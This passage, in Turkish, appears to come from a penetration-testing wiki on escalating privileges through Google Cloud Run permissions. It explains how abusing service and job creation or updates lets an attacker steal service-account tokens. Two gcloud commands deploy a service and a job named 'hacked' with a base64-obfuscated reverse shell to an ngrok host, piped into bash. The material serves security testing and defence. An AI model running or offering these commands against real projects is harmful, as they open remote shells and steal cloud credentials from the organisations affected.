Cloud Run

Cloud Run hakkında daha fazla bilgi için:

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

Bu izinlere sahip bir saldırgan, rastgele kod çalıştıran bir çalışma hizmeti oluşturabilir (rastgele Docker konteyneri), bir Hizmet Hesabını buna ekleyebilir ve kodun metadata'dan Hizmet Hesabı jetonunu dışarı çıkarmasını sağlayabilir.

Bu yöntem için bir saldırı betiği burada bulunabilir ve Docker imajı burada bulunabilir.

Sadece hizmet oluşturmak yerine gcloud run deploy kullanırken update iznine ihtiyaç duyar. Burada bir örnek kontrol edin.

run.services.update , iam.serviceAccounts.actAs

Öncekine benzer, ancak bir hizmeti güncellerken:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

run.services.setIamPolicy

Kendinize cloud Run üzerinde önceki izinleri verin.

run.jobs.create, run.jobs.run, (run.jobs.get)

Komutta belirtilen hizmet hesabını çalmak için ters kabuklu bir işlem başlatın. Burada bir saldırı örneği bulabilirsiniz.

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Öncekine benzer şekilde bir işi güncelleyebilir, hizmet hesabını güncelleyebilir, komutu ve çalıştırabilirsiniz:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

run.jobs.setIamPolicy

Kendinize önceki izinleri Cloud Jobs üzerinde verin.

Referanslar

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/